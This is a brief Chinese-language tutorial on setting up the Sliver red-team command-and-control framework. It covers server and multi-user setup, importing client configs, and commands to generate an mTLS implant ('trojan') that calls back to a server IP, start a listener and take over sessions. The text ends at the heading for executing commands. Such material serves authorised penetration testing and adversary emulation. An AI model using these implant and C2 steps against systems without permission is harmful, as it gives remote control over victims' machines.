sliver的简单使用
免责声明:由于传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本篇文章作者不为此承担任何责任,一旦造成后果请自行承担!
简介
Sliver 是一个开源的跨平台对手仿真/红队框架,各种规模的组织都可以使用它来执行安全测试。Sliver 生成的木马支持 C2 over Mutual TLS (mTLS)、WireGuard、HTTP(S) 和 DNS,并使用每个二进制非对称加密密钥进行动态编译。
服务器和客户端支持 MacOS、Windows 和 Linux。生成wen'jian在MacOS,Windows和Linux上都受支持
Sliver下载地址
https://github.com/BishopFox/sliver
启动服务端
如果是单用户到此服务端就配置完成,多用户的话需要配置如下:
生成客户端配置文件
server默认会监听一个端口31337,若修改的话可以通过~/.sliver/configs/server.json修改
启用多用户
下载客户端并导入生成的配置文件
./sliver-client_linux import /root/BTSEC_xx.xx.xx.xx.cfg #导入配置``
./sliver-client_linux
sliver(单用户) 基本使用
生成implant
implant主要支持:mac、windows、linux
generate --mtls server_ip --save ./sliver_agent --os Linux
开启监听
mtls 开启监听
jobs 查看任务
执行木马后,如果成功回连则会有一条通知同步client和server。
implants命令可以查看生成过的implants,包括回连信息
sessions
进入sessions
sessions -i id 或者 use id 进入会话
sessions -k id #杀死会话id
执行命令
